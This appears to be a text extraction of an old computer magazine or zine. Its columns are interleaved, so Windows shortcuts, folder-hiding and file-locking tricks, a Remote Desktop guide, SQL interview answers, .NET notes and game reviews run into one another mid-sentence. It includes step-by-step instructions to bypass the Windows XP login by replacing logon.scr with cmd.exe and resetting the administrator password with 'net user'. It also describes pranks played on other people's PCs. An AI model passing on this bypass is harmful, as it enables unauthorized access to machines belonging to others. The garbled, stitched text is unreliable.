CTRL + X = cut Type the following commands in your Run Box (Windows
CTRL + V = paste Key + R) or Start Run

Also don't forget about the "Right-click" key next to the right devmgmt.msc = Device Manager
Windows key on your keyboard. Using the arrows and that key msinfo32 = System Information
can get just about anything done once you've opened up any cleanmgr = Disk Cleanup
program. ntbackup = Backup or Restore Wizard (Windows Backup
Utility)
Keyboard Shortcuts mmc = Microsoft Management Console
[Alt] and [Esc] Switch between running applications excel = Microsoft Excel (If Installed)
[Alt] and letter Select menu item by underlined letter msaccess = Microsoft Access (If Installed)
[Ctrl] and [Esc] Open Program Menu powerpnt = Microsoft PowerPoint (If Installed)
[Ctrl] and [F4] Close active document or group windows (does winword = Microsoft Word (If Installed)
not work with some applications) frontpg = Microsoft FrontPage (If Installed)
[Alt] and [F4] Quit active application or close current window notepad = Notepad
[Alt] and [-] Open Control menu for active document wordpad = WordPad
Ctrl] Lft., Rt. arrow Move cursor forward or back one word calc = Calculator
Ctrl] Up, Down arrow Move cursor forward or back one msmsgs = Windows Messenger
paragraph mspaint = Microsoft Paint
[F1] Open Help for active application wmplayer = Windows Media Player
Windows+M Minimize all open windows rstrui = System Restore
Shift+Windows+M Undo minimize all open windows netscp6 = Netscape 6.x
Windows+F1 Open Windows Help netscp = Netscape 7.x
Windows+Tab Cycle through the Taskbar buttons netscape = Netscape 4.x
Windows+Break Open the System Properties dialog box waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser Use these keyboard shortcuts for dialog boxes:
Move forward through tabs. CTRL+TAB
type in u're adress "google", then press [Right CTRL] and [Enter] Move backward through tabs. CTRL+SHIFT+TAB
add www. and .com to word and go to it Move forward through options. TAB
Move backward through options. SHIFT+TAB
For Windows XP: Carry out the corresponding command or select the
corresponding option. ALT+Underlined letter
Copy. CTRL+C Carry out the command for the active option or button.
Cut. CTRL+X ENTER
Paste. CTRL+V Select or clear the check box if the active option is a check
Undo. CTRL+Z box. SPACEBAR
Delete. DELETE Select a button if the active option is a group of option
Delete selected item permanently without placing the item in the buttons. Arrow keys
Recycle Bin. SHIFT+DELETE Display Help. F1
Copy selected item. CTRL while dragging an item Display the items in the active list. F4
Create shortcut to selected item. CTRL+SHIFT while dragging Open a folder one level up if a folder is selected in the
an item Save As or Open dialog box. BACKSPACE
Rename selected item. F2
Move the insertion point to the beginning of the next word. If you have a Microsoft Natural Keyboard, or any other
CTRL+RIGHT ARROW compatible keyboard that includes the Windows logo key
Move the insertion point to the beginning of the previous word. and the Application key , you can use these keyboard
CTRL+LEFT ARROW shortcuts:
Move the insertion point to the beginning of the next paragraph.
CTRL+DOWN ARROW Display or hide the Start menu. WIN Key
Move the insertion point to the beginning of the previous Display the System Properties dialog box. WIN
paragraph. CTRL+UP ARROW Key+BREAK
Highlight a block of text. CTRL+SHIFT with any of the arrow Show the desktop. WIN Key+D
keys Minimize all windows. WIN Key+M
Select more than one item in a window or on the desktop, or Restores minimized windows. WIN Key+Shift+M
select text within a document. SHIFT with any of the arrow keys Open My Computer. WIN Key+E
Select all. CTRL+A Search for a file or folder. WIN Key+F
Search for a file or folder. F3 Search for computers. CTRL+WIN Key+F
View properties for the selected item. ALT+ENTER Display Windows Help. WIN Key+F1
Close the active item, or quit the active program. ALT+F4 Lock your computer if you are connected to a network
Opens the shortcut menu for the active window. domain, or switch users if you are not connected to a
ALT+SPACEBAR network domain. WIN Key+ L
Close the active document in programs that allow you to have Open the Run dialog box. WIN Key+R
multiple documents open simultaneously. CTRL+F4 Open Utility Manager. WIN Key+U
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC accessibility keyboard shortcuts:
Cycle through screen elements in a window or on the desktop. F6 Switch FilterKeys on and off. Right SHIFT for eight
Display the Address bar list in My Computer or Windows seconds
Explorer. F4 Switch High Contrast on and off. Left ALT+left
Display the shortcut menu for the selected item. SHIFT+F10 SHIFT+PRINT SCREEN
Display the System menu for the active window. Switch MouseKeys on and off. Left ALT +left SHIFT
ALT+SPACEBAR +NUM LOCK
Display the Start menu. CTRL+ESC Switch StickyKeys on and off. SHIFT five times
Display the corresponding menu. ALT+Underlined letter in a Switch ToggleKeys on and off. NUM LOCK for five
menu name seconds
Carry out the corresponding command. Underlined letter in a Open Utility Manager. WIN Key+U
command name on an open menu
Activate the menu bar in the active program. F10 shortcuts you can use with Windows Explorer:
Open the next menu to the right, or open a submenu. RIGHT Display the bottom of the active window. END
ARROW Display the top of the active window. HOME
Open the next menu to the left, or close a submenu. LEFT Display all subfolders under the selected folder. NUM
ARROW LOCK+ASTERISK on numeric keypad (*)
Refresh the active window. F5 Display the contents of the selected folder. NUM
View the folder one level up in My Computer or Windows LOCK+PLUS SIGN on numeric keypad (+)
Explorer. BACKSPACE Collapse the selected folder. NUM LOCK+MINUS SIGN
Cancel the current task. ESC on numeric keypad (-)
SHIFT when you insert a CD into the CD-ROM drive Prevent the Collapse current selection if it's expanded, or select parent
CD from automatically playing. folder. LEFT ARROW
Display current selection if it's collapsed, or select first
subfolder. RIGHT ARROW
How to hide your data on your Windows Machine
Some of the older windows users who are familar with the NULL How to make files Un-Deletable with
DOS Character (255) may know this other then that not many
people are aware of how to do such a thing. i use to do this trick FlashFXP
at school to friends pc's and also whenever i might have been in a
PC store just for fun make a folder on the desktop called Start FlashFXP..
'Hardcore Anal Sex' or something and see if the PC store dudes Go to Commands > Edit Custom Commands
worked out how to get rid of it next time i was there Smile Klik on: new cmd
Ok so this is how it works. in windows(DOS) there is 255 DOS Give it a name like: Make undeletable or something
Characters. by going into DOS/CMD and holding down Then in the text area above the buttons typ this:
(ALT+157) pressing 157 on the number pad. a weird character Code:
should appear. this is one of many. if you havent used a charmap
before try going to start/run and typing 'charmap' which willopen {
the windows character map, if you select a character u will see in rnfr %f
teh bottom of the window it has ALT+some_numbers which is rnto %f ./ /
the number code for that character. and because most standard }
keyboards only have around 108keys there must be character
codes Smile Hit OK..

Connect to a server..
Click right on a map or file en go to commands > make
undeletable..

And you're file is deletable.

ok so how does this help you protect your data? well if you were
to name a folder one of these character then windows wouldnt
know how to open it!. not all charcter but mainly characters that
are equivelent to NULL.. NULL looks like this ' ' nothing but a
space. like hitting space bar once, totally blank!..
ok so if you go to DOS and type cd C:\windows\desktop or what
ever. just go to a directory you can visually access and see later
on a physical drive (i.e. not D:\ or A:\).. ok so your in your
desktop.
now make a directory. `mkdir secretALT+255dir` now where
ALT+255 u have to hold down ALT and press 255 in your
number pad, it will just appear as tho u hit space bar once. now
go to your desktop and try to open/delete/rename this folder.
IMPOSSIBLE!! Smile the dir is completely locked and
untouchable by all forces of life (except for DOS at this stage). so
lets presume you have locked all your porno in there and your
parents have gone out and u want to watch some Smile. now you
have to go back into dos and rename the file to a normal name...
cd C:\windows\desktop
rename secretALT+255dir Folder_new_name
now you your folder should be back to normal and can be
accessed again.
hit F5 if you see no changes. Smile

have fun.
How To Remotely Access Your PC
Windows XP Professional includes a basic PC remote To enabling Remote Desktop, open the System Control
control tool which lets you log onto your PC remotely from Panel, go to the Remote tab, and check this box.
anywhere. Do you know how to use it?
It’s important to make sure the passwords on the machine
It’s called Remote Desktop Connection, and when you’ve you’re going to remotely log into are “good” ones. This
properly configured your PC, this handy utility will let you means you should use a mixture of letters and numbers,
log into your computer from anywhere in the world and avoid words that are found in dictionaries, and change the
control it as if you were sitting in front of it instead of half a password regularly to protect yourself from mischief.
world away.
Making the connection
If you’re running Windows XP Professional, you already
have all the software you need to connect remotely to your At this point, your PC should be prepped and patiently
PC. Whether you’d like to monitor a server, grab files from waiting for a connection. To log in, you need to open the
your home PC at work, or just keep an eye on your machines Remote Desktop Connection client on your remote PC. Go
when you’re out, connecting remotely is easy to do. to Start, Programs, Accessories, Communications, Remote
However, due to the vagaries of network configurations and Desktop Connection. Input the IP address you want to
various other quirks beyond your control, you may not be connect to (courtesy of IP Address Monster) in the Computer
able to actually connect. Until now. field. Then enter your username and password.

Prepping your system Now you’ll want to tweak a few settings to optimize your
remote experience. Whiz-bang features gobble up
First, you need to know the IP address of the computer you bandwidth, so you should tune your settings to match your
want to connect to. The only sure-fire way to always be able home net connection. We recommend you start with a
to connect to your PC’s is to use an ISP that provides you minimal feature set. Press the Options button, then the
with a static IP address. Most ISPs give customers dynamic Display tab. Change the display settings to full-screen, 256-
IP addresses, which can change every few days or even color. This looks acceptable and consumes practically no
hours. Because your IP address is the way you’ll locate your bandwidth. You’ll also want to browse to the Experience tab
computer on the net, you’ll need to know what your IP and change the Performance setting to reflect your home
address is and monitor it as it changes. PC’s connection speed.
Switching to a lower color resolution and a smaller display
The good news is that there are loads of programs that will area will greatly minimize the amount of data that has to
notify you of IP address changes, whenever they occur. We transfer between your computer and the remote PC.
like IP Address Monster (www.ipmonster.com). It’s a small Once you’ve tuned the connection a bit, you’re ready to
program that runs in your system tray and can be configured connect. Press the Connect key and you’re in!
to e-mail you whenever your IP address changes.
What to do next
IP Address Monster should be your first stop to remote
connectivity. This handy utility will keep tabs on your At this point, you should be connected. You can run
Internet address and send you an e-mail whenever it changes. programs and manipulate files just like you’re sitting in front
of your PC. In fact, you can even use your PC’s e-mail and
Now that you know your IP address, you need to make sure web browsers. Do you want to start downloading Desert
that Remote Desktop Connection is enabled. Make sure your Combat now so you can start playing it when you get home?
firewall is configured to allow incoming connections on port That’s easy enough; just log into your PC using Remote
3389 (firewalls vary, so check your documentation to find Desktop, open your web browser, and download the file. It
out how to open the port). will be sitting on your machine waiting for you as soon as
you get home. If all your PCs are running Windows XP Pro,
You can turn on Remote Desktop Connection in the System and you enable drive-sharing in the Local Resources tab, you
Control Panel (Start, Control Panel, System). Check the can transfer files from remote PC to local PC. You can even
Remote tab and make sure “Allow users to connect remotely remotely transfer files between local PCs on your home
to this computer” is checked. You’ll also need to have at network.
least one user account that requires a password because Once connected, you can interact with printer ports and
accounts without passwords are prohibited from logging into networked hard drives. This is a handy way to delete those
Remote Desktop. “special interest” videos you downloaded before your wife
finds them.
FORGOT YOUR PASSWORD ON XP? HERE'S
WHAT TO DO!
Have you forgotten your password and you don't want to re-
format your computer?
Track Ip Connected To Ur Pc

Well here's what you do.. Please note that this only works on Open notepad and copy and paste the following
Windows XP! commands in it and save it as getip.cmd
Code:
PLEASE READ CAREFULLY! @echo.
@color 09
1. Restart you computer @netstat -n
@echo.
2.When booting, press F8 and select "Safe Mode" @pause

3.After getting to the user menu. Click on a user and this Now execute this file (double click) and you can see
time it will not ask you for a password your IP in the command prompt.
It works only in NT based OS.
4.Go to Start>Run and type "CMD" (without the quotes).

5.At command prompt type in "cd C:\Windows\System32"


How to speed up your firefow
(without the quotes), I am assuming C is your browser
System/Windows Drive
1. Type "about:config" into the address bar and hit
6.For safety purposes first make a backup of your Logon.Scr return. Scroll down and look for the following entries:
file.. You can do this by typing in "Copy to Logon.scr to
Logon.bak" (without the quotes) network.http.pipelining
7.Then type "copy CMD.EXE Logon.scr"(without the
quotes) network.http.proxy.pipelining

8.Then type this command, I will assume that you want to set network.http.pipelining.maxrequests
Administrator's password to "MyNewPass" (without the
quotes) Normally the browser will make one request to a web
page at a time. When you enable pipelining it will make
9.Now, type this in (I am assuming that you are still in the several at once, which really speeds up page loading.
directory C:\Windows\System32) , "net user administrator
MyNewPass" without the quotes 2. Alter the entries as follows:

10. You will get a message saying that it was successful, this Set "network.http.pipelining" to "true"
means Administrator's new password is "MyNewPass" Set "network.http.proxy.pipelining" to "true"
(without the quotes)
set "network.http.pipelining.maxrequests" to some
11. Restart the PC and you will login as Administrator (or number like 30. This means it will make 30 requests at
whatever you chose to reset) with your chosen password and once.
Enjoy!
3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to
"0". This value is the amount of time the browser waits
before it acts on information it recieves.
7. WHAT ARE HIERARCHICAL, NETWORK, AND
RELATIONAL DATABASE MODELS?
Ans: a) Hierarchical Model: The Hierarchical Model was
introduced in the Information Management System (IMS)
developed by IBM in 1968. In this data is organized as a
tree structure. Each tree is made of nodes and branches.
The nodes of the tree represent the record types and it is a
collection of data attributes entity at that point. The
topmost node in the structure is called the root. Nodes
succeeding lower levels are called children.
Network Model: The Network Model, also called as the
CODSYL database structure, is an improvement over the
1. WHAT IS DATA OR INFORMATION?
Hierarchical mode, in this model concept of parent and
Ans: The Matter that we feed into the Computer is
child is expanded to have multiple parent-child
called Data or Information.
relationships, i.e. any child can be subordinate to many
2. WHAT IS DATABASE?
different parents (or nodes). Data is represented by
Ans: The Collection of Interrelated Data is called Data
collection of records, and relationships among data are
Base.
represented by links. A link is an association between
3. WHAT IS A DATABASE MANAGEMENT
precisely two records. Many-to-many relationships can
SYSTEM (DBMS) PACKAGE?
exists between the parent and child.
Ans: The Collection of Interrelated Data and some
c) Relational Model: The Relational Database Model
Programs to access the Data is Called Data Base
eliminates the need for explicit parent-child relationships.
Management System (DBMS).
In RDBMS, data is organized in two-dimensional tables
4. WHEN CAN WE SAY A DBMS PACKAGE AS
consisting of relational, i.e. no pointers are maintained
RDBMS?
between tables.
Ans: For a system to Qualify as RELATIONAL
8. WHAT IS DATA MODELING?
DATABASE MANAGEMENT system, it must use its
Ans: Data Modeling describes relationship between the
RELATIONAL facilities to MANAGE the
data objects. The relationships between the collections of
DATABASE.
data in a system may be graphically represented using data
5. WHAT IS ORDBMS?
modeling.
Ans: Object (oriented) Relational Data Base
9. DEFINE ENTITY, ATTRIBUTE AND
Management System is one that can store data, the
RELATIONSHIP.
relationship of the data, and the behavior of the data
Ans: Entity: An Entity is a thing, which can be easily
(i.e., the way it interacts with other data).
identified. An entity is any object, place, person, concept
6. NAME SOME CODD'S RULES.
or activity about which an enterprise records data.
Ans: Dr. E.F. Codd presented 12 rules that a database
Attribute: An attribute is the property of a given entity.
must obey if it is to be considered truly relational. Out
Relationship: Relationship is an association among
those, some are as follows
entities.
a) The rules stem from a single rule- the ‘zero rule’: For
10. WHAT IS ER-MODELING?
a system to Qualify as RELATIONAL DATABASE
Ans: The E-R modeling technique is the Top Down
MANAGEMENT system, it must use its
Approach. Entity relationship is technique for analysis and
RELATIONAL facilities to MANAGE the DATABASE
logical modeling of a system’s data requirements. It is the
Information Rule: Tabular Representation of
most widely used and has gained acceptance as the
Information.
ideal database design. It uses three basic units: entities,
c) Guaranteed Access Rule: Uniqueness of tuples for
their attributes and the relationship that exists between
guaranteed accessibility.
the entities. It uses a graphical notation for representing
d) Missing Information Rule: Systematic representation
these.
of missing information as NULL values.
11. WHAT IS NORMALIZATION?
e) Comprehensive Data Sub-Language Rule: QL to
Ans: Normalization is a step-by-step decomposition of
support Data definition, View definition, Data
manipulation, Integrity, Authorization and Security. complex records into simple records.
11. WHAT IS NORMALIZATION? 18. CLASSIFICATION OF SQL COMMANDS?
Ans: Normalization is a step-by-step decomposition of Ans: DDL (Data Definition Language) DML (Data
complex records into simple records. Manipulating Language) DCL (Data Control
12. WHAT ARE VARIOUS NORMAL FORMS OF Language) DTL(Data Transaction Language)
DATA? Create Alter Drop Select Insert Update Delete Rollback
Ans: The First Normal Form 1NF, The Second Normal Commit Grant Revoke
Form 2NF, The Third Normal Form 3NF, The Boyce
and Codd Normal Form BC NF. 19. WHAT IS DIFFERENCE BETWEEN DDL AND
13. WHAT IS DENORMALIZATION? DML COMMANDS?
Ans: The intentional introduction of redundancy to a Ans: For DDL commands autocommit is ON implicitly
table to improve performance is called whereas For DML commands autocommit is to be
DENORMALIZATION. turned ON explicitly.
14. WHAT ARE 1-TIER, 2-TIER, 3-TIER OR N- 20. WHAT IS DIFFERENCE BETWEEN A
TIER DATABASE ARCHITECTURES? TRANSACTION AND A QUERY?
Ans: 1-Tier Database Architecture is based on single Ans: A Transaction is unit of some commands where as
system, which acts as both server and client. 2-Tier Query is a single line request for the information from
Architecture is based on one server and client. 3-Tier the database.
Architecture is based on one server and client out that on 21. WHAT IS DIFFERENCE BETWEEN
client act as a remote system. N-Tier Architecture is TRUNCATE AND DELETE COMMANDS?
based on N no. Of servers and N no. Of clients. Ans: Truncate Command will delete all the records
where as Delete Command will delete specified or all
the records depending only on the condition given.
22. WHAT IS DIFFERENCE BETWEEN UPDATE
AND ALTER COMMANDS?
Ans: Alter command is used to modify the database
objects where as the Update command is used to modify
the values of a data base objects.
23. WHAT ARE COMMANDS OF TCL
CATEGORY?
Ans: Grant and Revoke are the two commands belong to
the TCL Category.
24. WHICH IS AN EFFICIENT COMMAND -
TRUNCATE OR DELETE? WHY?
Ans: Delete is the efficient command because using this
command we can delete only those records that are not
really required.
25. WHAT ARE RULES FOR NAMING A TABLE
15. WHAT ARE A TABLE, COLUMN, AND OR COLUMN?
RECORD? Ans: 1) Names must be from 1 to 30 bytes long.
Ans: Table: A Table is a database object that holds your 2) Names cannot contain quotation marks.
data. It is made up of many columns. Each of these 3) Names are not case sensitive.
columns has a data type associated with it. Column: A 4) A name must begin with an alphabetic character from
column, referred to as an attribute, is similar to a field in your database character set and the characters $ and #.
the file system. Record: A row, usually referred to as But these characters are discouraged.
tuple, is similar to record in the file system. 5) A name cannot be ORACLE reserved word.
16. WHAT IS DIFFERENCE BETWEEN A 6) A name must be unique across its namespace. Objects
PROCEDURAL LANGUAGE AND A in the name space must have different names.
NON-PROCEDURAL LANGUAGE? 7) A name can be enclosed in double quotes.
Ans:
Procedural Language NON-Procedural Language
A program in this implements a step-by-step algorithm
to solve the problem. It contains what to do but not how
to do
17.WHAT TYPE OF LANGUAGE "SQL" IS?
Ans: SQL is a Non-procedural, 4th generation
Language,/ which concerts what to do rather than how to
do any process.
OT: Official
Name for
Windows 26. HOW MANY COLUMNS CAN A TABLE 34. WHAT IS A CONSTRAINT? WHAT ARE
"Longhorn" HAVE? ITS VARIOUS LEVELS?
Announced Ans: A Table can have 1000 columns. Ans: Constraint: Constraints are representators of
27. WHAT ARE DIFFERENT DATATYPES the column to enforce data entity and
The next version SUPPORTED BY SQL? consistency.There r two levels
of Windows Ans: Char (size), Nchar (size), Varchar2 (size),
finally has an 1)Column-level constraints 2)Table-level
official name: Nvarchar2 (size) data types for character values, constraints.
Windows Vista. Number (precision, scale), Number, Number (n), Float, 35. LIST OUT ALL THE CONSTRAINTS
The advertising Float (binary precision) data types for numerical values, SUPPORTED BY SQL.
tagline for Vista Date data type for date values, Long, Raw (size), Long
is "Clear, Ans: Not Null, Unique, Check, Primary Key and
Confident, Raw, Clob, Blob, Nclob, Bfile for large objects. Foreign Key or Referential Integrity.
Connected: 28. WHAT IS DIFFERENCE BETWEEN LONG 36. WHAT IS DIFFERENCE BETWEEN
Bringing clarity AND LOB DATATYPES? UNIQUE+NOT NULL AND PRIMARY KEY?
to your world," Ans: LOB LONG
according to a Ans: Unique and Not Null is a combination of two
video of the 1) The maximum size is 4GB. Constraints that can be present any number of times
announcement 2) LOBs (except NCLOB) can be attributes of an object in a table and can’t be a referential key to any
posted by type. column of an another table where as Primary Key is
Microsoft. 3) LOBs support random access to data. single Constraint that can be only once for table and
4) Multiple LOB columns per table or LOB attributes in can be a referential key to a column of another table
an object type. becoming a referential integrity.
1) The maximum size is 2GB. 2) LONGs cannot. 3) 37. WHAT IS A COMPOSITE PRIMARY
LONGs support only sequential access. KEY?
4) Only one LONG column was allowed in a table Ans: A Primary key created on combination of
29. WHAT IS DIFFERENCE BETWEEN CHAR columns is called Composite Primary Key.
AND VARCHAR2 DATATYPES? 39. HOW TO DEFINE A NULL VALUE?
Ans: Varchar2 is similar to Char but can store variable Ans: A NULL value is something which is
no. Of characters and while querying the table varchar2 unavailable, it is neither zero nor a space and any
trims the extra spaces from the column and fetches the mathematical calculation with NULL is always
rows that exactly match the criteria. NULL.
30. HOW MUCH MEMORY IS ALLOCATED FOR 40. WHAT IS NULL? A CONSTRAINT OR
The company also DATE DATATYPE? WHAT IS DEFAULT DEFAULT VALUE?
said Friday that the DATE FORMAT IN ORACLE? Ans: It is a default value.
first beta, or test Ans: For Date data type oracle allocates 7 bytes
release, of Vista is 41. WHAT IS DEFAULT VALUE FOR EVERY
Memory. Default Date Format is: DD-MON-YY. COLUMN OF A TABLE?
slated for release by
Aug. 3. That release 31. WHAT IS RANGE FOR EACH DATATYPE OF Ans: NULL.
will be targeted at SQL? 42. WHAT IS CREATED IMPLICITLY FOR
developers and IT Ans: Datatype Range Char Varchar2 Number Float
professionals, said EVERY UNIQUE AND PRIMARY KEY
LONG, RAW, LONGRAW Large Objects (LOB’s) COLUMNS?
Brad Goldberg,
general manager of 2000 bytes 4000 bytes Precision 1 to 38 Scale -84 to 127 Ans: Index.
Windows product Precision 38 decimals Or 122 binary precision 2 GB 43. WHAT ARE LIMITATIONS OF CHECK
development ... The 4GB
software giant spent CONSTRAINT?
32. HOW TO RENAME A COLUMN? Ans: In this we can't specify Pseudo Columns like
roughly eight
months researching Ans: We can’t rename a Column of a table directly. So sysdate etc.
potential names for we follow the following steps. To Rename a Column: 44. WHAT IS DIFFERENCE BETWEEN
the upcoming a) Alter the table specifying new column name to be
version of REFERENCES AND FOREIGN KEY
given and data type. Then copy the values in the column CONSTRAINT?
Windows.
to be renamed into new column. Ans: References is used as column level key word
c) drop the old column. where as foreign key is used as table level
33. HOW TO DECREASE SIZE OR CHANGE constraint.
DATATYPE OF A COLUMN? 45. WHAT IS "ON DELETE CASCADE"?
Ans: To Decrease the size of a Data type of a column Ans: when this key word is included in the
i. Truncate the table first. definition of a child table then whenever the records
ii. Alter the table column whose size is to be decreased from the parent table is deleted automatically the
using the same name and data type but new size. respective values in the child table will be deleted.
46. WHAT IS PARENT-CHILD OR MASTER- 59. WHAT IS A CORRELATED SUB QUERY,
DETAIL RELATIONSHIP? HOW IT IS DIFFERENT FROM A NORMAL
Ans: A table which references a column of another SUB QUERY?
table(using References)is called as a child table(detail Ans: A correlated subquery is a nested subquery,
table) and a table which is being referred is called which is executed once for each ‘Candidate row’ by
Parent (Master) Table . the main query, which on execution uses a value from
47. HOW TO DROP A PARENT TABLE WHEN a column in the outer query. In normal sub query the
IT’S CHILD TABLE EXISTS? result of inner query is dynamically substituted in the
Ans: Using "on delete cascade". condition of the outer query where as in a correlated
48. IS ORACLE CASE SENSITIVE? subquery, the column value used in inner query refers
Ans: NO to the column value present in the outer query forming
49. HOW ORACLE IDENTIFIES EACH a correlated subquery.
RECORD OF TABLE UNIQUELY? 60. WHAT IS A JOIN - TYPES OF JOINS?
Ans: By Creating indexes and reference IDs. Ans: A join is used to combine two or more tables
50. WHAT IS A PSEUDO-COLUMN? NAME logically to get query results. There are four types of
SOME PSEUDO-COLUMNS OF ORACLE? Joins namely EQUI Join NON-EQUI Join SELF Join
Ans: Columns that are not created explicitly by the OUTER Join.
user and can be used explicitly in queries are called 61. WHAT ARE MINIMUM REQUIREMENTS
Pseudo-Columns. FOR AN EQUI-JOIN?
Ex:currval,nextval,sysdate…. Ans: There shold be atleast one common column
51. WHAT FOR "ORDER BY" CLAUSE FOR A between the joining tables.
QUERY? 62. WHAT IS DIFFERENCE BETWEEN LEFT,
Ans: To arrange the query result in a specified RIGHT OUTER JOIN?
order(ascending,descending) by default it takes Ans:If there r any values in one table that do not have
ascending order. corresponding values in the other,in an equi join that
52. WHAT IS "GROUP BY" QUERIES? row will not be selected.Such rows can be forcefully
Ans: To group the query results based on condition. selected by using outer join symbol(+) on either of the
53. NAME SOME AGGREGATE FUNCTIONS sides(left or right) based on the requirement.
OF SQL? 63. WHAT IS DIFFERENCE BETWEEN EQUI
Ans: AVG, MAX, SUM, MIN,COUNT. AND SELF JOINS?
54. WHAT IS DIFFERENCE BETWEEN COUNT Ans: SELF JOIN is made within the table whereas
(), COUNT (*) FUNCTIONS? EQUI JOIN is made between different tables having
Ans: Count () will count the specified column whereas common column.
count (*) will count total no. of rows in a table. 64. WHAT ARE "SET" OPERATORS?
55. WHAT FOR ROLLUP AND CUBE Ans: UNION, INTERSECT or MINUS is called SET
OPERATORS ARE? OPERATORS.
Ans: To get subtotals and grand total of values of a 65. WHAT IS DIFFERENCE BETWEEN
column. "UNION" AND "UNION ALL" OPERATORS?
56. WHAT IS A SUB-QUERY? Ans: UNION will return the values distinctly whereas
Ans: A query within a query is called a sub query UNION ALL will return even duplicate values.
where the result of inner query will be used by the
outer query. ****END of Part 1****
57. WHAT ARE SQL OPERATORS? ****Will continue in next issue****
Ans: Value (), Ref () is SQL operator.
58. EXPLAIN
"ANY","SOME","ALL","EXISTS"
OPERATORS?
Ans: Any: The Any (or it’s synonym SOME) operator
computes the lowest value from the set and compares
a value to each returned by a sub query. All: ALL
compares a value to every value returned by SQL.
Exists: This operator produces a BOOLWAN results.
If a sub query produces any result then it evaluates it
to TRUE else it evaluates it to FALSE.
What platforms do .NET XML Web Services run on?
Currently, they're supported on Windows 2000 and Windows
XP. ASP.NET integrates with Internet Information Server
(IIS) and thus requires that IIS be installed. It runs on server
and non-server editions of Windows 2000 and XP as long as
IIS is installed.
Can two different programming languages be mixed in a
single ASMX file?
No.
What is code-behind?
Code-behind allows you to associate Web Service source code
written in a CLR compliant language (such as C# or VB.NET)
as compiled in a separate file (typically *.asmx.cs or
*.asmx.vb). You would otherwise typically find the executable
code directly inserted into the .asmx file.
What namespaces are imported by default in ASMX files?
The following namespaces are imported by default. Other
namespaces must be imported manually.· System,
System.Collections,System.ComponentModel,System.Data,
System.Diagnostics,System.Web,System.Web.Services
How do I provide information to the Web Service when the
information is required as a SOAP Header?
The key here is the Web Service proxy you created using
wsdl.exe or through Visual Studio .NET's Add Web Reference
menu option. If you happen to download a WSDL file for a
Web Service that requires a SOAP header, .NET will create a
SoapHeader class in the proxy source file. Using the previous
example:
public class Service1 :
System.Web.Services.Protocols.SoapHttpClientProtocol
{
public AuthToken AuthTokenValue;

[System.Xml.Serialization.XmlRootAttribute(Namespace="http
://tempuri.org/", IsNullable=false)]
public class AuthToken : SoapHeader { public
string Token; }}
In this case, when you create an instance of the proxy in your
main application file, you'll also create an instance of the
AuthToken class and assign the string:
Service1 objSvc = new Service1();
processingobjSvc.AuthTokenValue = new AuthToken();
objSvc.AuthTokenValue.Token = <actual token value>;
Web Servicestring strResult =
objSvc.MyBillableWebMethod();
What is WSDL?
WSDL is the Web Service Description Language, and it is
implemented as a specific XML vocabulary. While it's very
much more complex than what can be described here, there are
two important aspects to WSDL with which you should be
aware. First, WSDL provides instructions to consumers of
Web Services to describe the layout and contents of the SOAP
packets the Web Service intends to issue. It's an interface
description document, of sorts. And second, it isn't intended
that you read and interpret the WSDL. Rather, WSDL should
be processed by machine, typically to generate proxy source
code (.NET) or create dynamic proxies on the fly (the SOAP
Toolkit or Web Service Behavior).
Rome: Total War Barbarian Invasion

Barbarian Invasion sweeps Europe, Rome: Total War - Barbarian Invasion


North America E3 2005 Impressions
Excellent news: One of the best strategy games of 2004 is
getting an expansion.

PC strategy fans got a major shock earlier this year when


Sega acquired British developer Creative Assembly, the
creator of the acclaimed Total War series of strategy
games. To make things even worse, Sega promptly
announced that CA's next game would be a hybrid
action/strategy game developed for the consoles. Was
nothing sacred? Well, the Creative Assembly folks haven't
turned their backs on the PC, and the company is still
plugging away on the platform that made them. It is also
putting the finishing touches on Rome: Total War -
Barbarian Invasion, the expansion pack to one of last
year's best games.

So what can we expect in Barbarian Invasion? Like the


Viking Invasion expansion for Medieval: Total War,
Barbarian Invasion depicts a very dark era in human
history: the slow collapse of the once-mighty Roman
Empire. As a result, the game is set hundreds of years after
the main campaign in the original game, and you'll have a
whole host of new barbarian tribes and nations to deal
with, such as the Ostrogoths. And keep in mind that the
Roman Empire had split into two, with the Byzantine
Empire setting up in Constantinople. Other additions to the
campaign game include 21 new buildings and
technologies.

Sega ships Rome: Total War expansion; add-on takes place There are some major new additions to the real-time battle
200 years after original game, features 10 new factions, night system as well. The biggest is the introduction of night
battles, and more. battles in the expansion. This means that you'll now see
formations in the distance by their torches, and you'll also
The union of Sega and The Creative Assembly has yielded see cool lighting effects, such as the way a blazing fireball
its first fruit today, as the Rome: Total War Barbarian briefly illuminates the ground as it flies through the air.
Invasion expansion pack is now headed to retailers across One big question that remains, though, is whether Creative
Europe and North America. Assembly can retrofit night battles into the original Rome:
Total War. It's something that the company is looking into,
but it may require a lot of code changes it doesn't have
Set 200 years after the main campaign of Rome: Total War, time for. Another new addition is that some types of units
Barbarian Invasion sees the outsider hordes massing on the now have limited swimming ability, so they'll be able to
borders of a declining Roman Empire. It's up to players to wade into a river and even swim a short distance, giving
decide whether they will save Rome from its enemies or you some extra mobility on the battlefield, as well as a
simply sack it. In addition to the new campaign mode, way to escape entrapment. Of course, there are plenty of
Barbarian Invasion adds new features and units to the real- new units to play with as well.
time strategy game. There are 10 new factions, more than
100 new units, night battles, revamped artificial intelligence
in battles, and more.
Ultimate Spider-Man
The Good The Ultimate Spider-Man comic series is a reenvisioning of
Colorful, crisp cel-shading gives the game an awesome the early days of Spider-Man lore. Here, Peter Parker is a
comic book-inspired look; Some excellent boss fights; scrawny 15-year-old kid, granted his powers via the
Sharp voice acting and writing; Good story; infamous radioactive spider on a class field trip. The plot of
The Bad the Ultimate Spider-Man game doesn't spend much time
Too many lame race and chase missions; Too few story getting you up to speed with this, instead taking just a brief
missions--remaining side missions aren't good enough to minute or two to quickly show Parker's transformation into
warrant much replay value; Camera can sometimes make the titular hero, as well as a bit of backstory about how he
combat a pain; and his childhood friend, Eddie Brock, stumble upon a
Serious webheads will get something positive out of mysterious bioengineered suit that both their fathers had
Ultimate Spider-Man, but they should do so with one of apparently been working on before their deaths. As any
the console versions, as the PC version of the game isn't comic aficionado might assume, this is the suit that turns
the ideal one. Brock into the gruesome, tongue-lashing beast known as
Venom, and that's right where things pick up. The plot itself
is something of a disjointed affair; it's really more of an
Superhero games, like superhero movies, are steadily
excuse to squeeze as many relevant Marvel characters as
starting to improve. Generally, it helps to base a game
possible into the package. But it does a good job of
